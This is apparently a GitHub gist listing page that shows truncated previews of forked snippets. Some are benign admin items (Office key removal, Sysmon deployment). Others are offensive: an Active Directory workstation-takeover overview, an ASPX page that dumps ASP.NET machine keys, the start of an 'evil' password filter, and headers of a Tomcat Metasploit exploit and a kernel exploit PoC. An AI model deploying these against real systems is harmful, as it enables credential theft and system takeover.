Skip to content

Instantly share code, notes, and snippets.

View Gh0st0ne's full-sized avatar

Gh0st0ne

100 followers · 128 following
View GitHub Profile
@Gh0st0ne
Gh0st0ne / README.MD
Created November 17, 2021 08:56 — forked from giordanocardillo/README.MD
Remove Office 2016 Product Key
  1. Open a command prompt as Administrator
  2. In the command prompt, type the following:

  • Office 2016 (32-bit) on a 32-bit version of Windows

    cscript "C:\Program Files\Microsoft Office\Office16\OSPP.VBS" /dstatus

  • Office 2016 (32-bit) on a 64-bit version of Windows

    cscript "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus

  • Office 2016 (64-bit) on a 64-bit version of Windows

@Gh0st0ne
Gh0st0ne / SysmonStartup.bat
Created September 21, 2021 10:31 — forked from silentbreaksec/SysmonStartup.bat
Windows batch file to deploy Sysmon using a startup script via GPO
@echo off
:: Author: Ryan Watson
:: Twitter: @gentlemanwatson
:: Version: 1.0
:: Credits: Credit to Syspanda.com and their Sysmon GPO article for the kick off point
:: https://www.syspanda.com/index.php/2017/02/28/deploying-sysmon-through-gpo/
:: ** IMPORTANT **
:: 1) Create a Sysmon folder with the SYSVOL share on your domain controller
:: 2) Download Sysmon from Microsoft and place both sysmon.exe and sysmon64.exe in
@Gh0st0ne
Gh0st0ne / Workstation-Takeover.md
Created July 26, 2021 22:56 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@Gh0st0ne
Gh0st0ne / machineKeyFinder.aspx
Created June 13, 2021 19:11 — forked from irsdl/machineKeyFinder.aspx
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)
@Gh0st0ne
Gh0st0ne / evilpassfilter.cpp
Created May 13, 2021 08:50 — forked from mubix/evilpassfilter.cpp
Evil "Password Filter"
#include <windows.h>
#include <stdio.h>
#include <WinInet.h>
#include <ntsecapi.h>
void writeToLog(const char* szString)
{
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+");
if (NULL == pFile)
{
@Gh0st0ne
Gh0st0ne / user-agents.txt
Created May 13, 2021 08:34 — forked from pzb/user-agents.txt
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9
Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0)
@Gh0st0ne
Gh0st0ne / gov-domains
Created May 13, 2021 08:33 — forked from pzb/gov-domains
18F.GOV
29PALMSBOMI-NSN.GOV
511MAINE.GOV
511NY.GOV
511TX.GOV
511WI.GOV
9-11COMMISSION.GOV
911COMMISSION.GOV
911.GOV
AAPI.GOV
@Gh0st0ne
Gh0st0ne / tomcat_mce_upload.rb
Created April 28, 2021 02:05 — forked from infoslack/tomcat_mce_upload.rb
Apache Tomcat Manager Code Execution Exploit
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@Gh0st0ne
Gh0st0ne / it-ebooks.md
Created March 24, 2021 17:06 — forked from baiwfg2/it-ebooks.md
Download ebooks as you want
@Gh0st0ne
Gh0st0ne / ip6_expl_poc.c
Created March 22, 2021 22:14 — forked from Cryptogenic/ip6_expl_poc.c
Kernel exploit POC (Proof-of-Concept) for IP6_EXTHDR_CHECK double free (CVE-2020-9892). Interleaves with multi-threads for code exec. Mainly a reference for PS4 implementation.
/*
* IP6_EXTHDR_CHECK Double Free (CVE-2020-9892) Exploit PoC for FreeBSD 9.0
* https://github.com/google/security-research/security/advisories/GHSA-gxcr-cw4q-9q78
* -
* Bug credit: Andy Nguyen (@theflow0)
* Exploit credit: @SpecterDev, @tihmstar
* Thanks: @sleirsgoevy, @littlelailo, flatz (@flat_z), @balika011
* -
* Build: gcc -o expl ip6_expl_poc.c -pthread
* -